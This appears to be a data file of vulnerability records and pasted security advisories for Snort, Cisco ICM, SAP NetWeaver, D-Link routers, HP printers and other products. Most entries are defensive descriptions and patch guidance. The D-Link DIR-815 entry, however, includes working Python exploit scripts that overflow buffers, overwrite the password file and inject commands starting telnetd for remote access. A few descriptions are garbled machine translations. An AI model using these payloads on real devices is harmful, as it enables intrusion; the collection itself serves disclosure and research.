iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-200702-0378	Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201011-0225	Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-201112-0297	Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201507-0645	D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import urllib import urllib2 # This exploits the auth_main.cgi with read buffer overflow exploit for v2.02 # prequisite is just to have id and password fields in params url = 'http://192.168.0.1/authentication.cgi' junk = "A"1004+"B"37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read() ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct # format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address) buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"20+"ZZZZ"+"telnetd -p 6778"+"C"5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Command injection in ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CSRF or any other trickery, but probably only works when connected to network I suppose buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
var-201803-1810	A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to DOPSoft 4.00.04 are vulnerable
var-201809-0087	WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
var-200607-0396	Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability: DELTAINTERVAL LOGFOLDER DELETELOGS FWASERVER SYSLOGPUBLICIP GETFWAIMPORTLOG GETFWADELTA DELETERDEPDEVICE COMPRESSRAWLOGFILE GETSYSLOGFIREWALLS ADDPOLICY EDITPOLICY. TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities http://www.zerodayinitiative.com/advisories/TSRT-06-03.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since July 24, 2006 by Digital Vaccine protection filter ID 4319. Authentication is not required to exploit this vulnerability. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/ EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor 2006.07.24 - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Cody Pierce, TippingPoint Security Research Team. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201702-0423	An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of data from a LAD file. A crafted length element can trigger an overflow of a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-202305-1588	D-Link DIR-2150 SetNTPServerSettings Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20553. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-201112-0173	The default configuration of the HP CM8060 Color MFP with Edgeline; Color LaserJet 3xxx, 4xxx, 5550, 9500, CMxxxx, CPxxxx, and Enterprise CPxxxx; Digital Sender 9200c and 9250c; LaserJet 4xxx, 5200, 90xx, Mxxxx, and Pxxxx; and LaserJet Enterprise 500 color M551, 600, M4555 MFP, and P3015 enables the Remote Firmware Update (RFU) setting, which allows remote attackers to execute arbitrary code by using a session on TCP port 9100 to upload a crafted firmware update. HP Printers and Digital Senders are prone to a security-bypass vulnerability. An attacker may leverage the issue to remotely install malicious printer firmware. The unauthorized firmware could also cause a Denial of Service to the device. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03102449 Version: 3 HPSBPI02728 SSRT100692 rev.3 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-11-30 Last Updated: 2012-01-09 Potential Security Impact: Remote firmware update enabled by default Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with certain HP printers and HP digital senders. References: CVE-2011-4161 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION below for a list of impacted products. A firmware update can be sent remotely to port 9100 without authentication. RESOLUTION The following steps can be taken to avoid unauthorized firmware updates: Update the firmware to a version that implements code signing Disable the Remote Firmware Update The code signing feature verifies that firmware updates are properly signed. This will prevent the installation of invalid firmware updates. Note: A firmware update may be required to allow the RFU to be disabled or to implement code signing. Code signing is not available on all the affected devices. Please refer to the following table. Firmware updates for any of the products can also be downloaded as follows. Browse to www.hp.com/go/support then: Select "Drivers & Software" Enter the product name listed in the table above into the search field Click on "Search" If the search returns a list of products click on the appropriate product Under "Select operating system" click on "Cross operating system (BIOS, Firmware, Diagnostics, etc.)" If the "Cross operating system ..." link is not present, select any Windows operating system from the list. Select the appropriate firmware update under "Firmware" HISTORY Version:1 (rev.1) - 30 November 2011 Initial release Version:2 (rev.2) - 23 December 2011 Code signing firmware available Version:3 (rev.3) - 9 January 2012 Combined tables Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk8KykcACgkQ4B86/C0qfVl09ACg1m3AQDGq/VzvFgb4j6bj3fJU VnkAoO9oPSjyrVB07qLIBpcXALxLRRRg =mXzy -----END PGP SIGNATURE----- . However, the information is applicable to all the devices listed above. This revision, version 6, of the Security Bulletin announces the availability of firmware updates for additional devices
var-201103-0371	SAP Crystal Reports Server is a complete reporting solution for creating, managing, and delivering reports through the web or embedded enterprise applications. There is an input validation error in SAP Crystal Reports Server. The input passed to aa-open-inlist.jsp via the \"url\", \"sWindow\", \"BEGIN_DATE\", \"END_DATE\", \"CURRENT_DATE\" and \"CURRENT_SLICE\" parameters is missing before returning to the user. Filtering can lead to cross-site scripting attacks
var-201706-0017	In FortiClientWindows 5.4.1 and 5.4.2, an attacker may escalate privilege via a FortiClientNamedPipe vulnerability. fortinet's Windows for FortiClient contains vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiClient is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges. FortiClient 5.4.1 and 5.4.2 are vulnerable. Fortinet FortiClient is a mobile terminal security solution developed by Fortinet. The solution provides IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication when connected to FortiGate firewall appliances
var-202305-1520	D-Link DIR-2150 SetSysEmailSettings EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20556. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
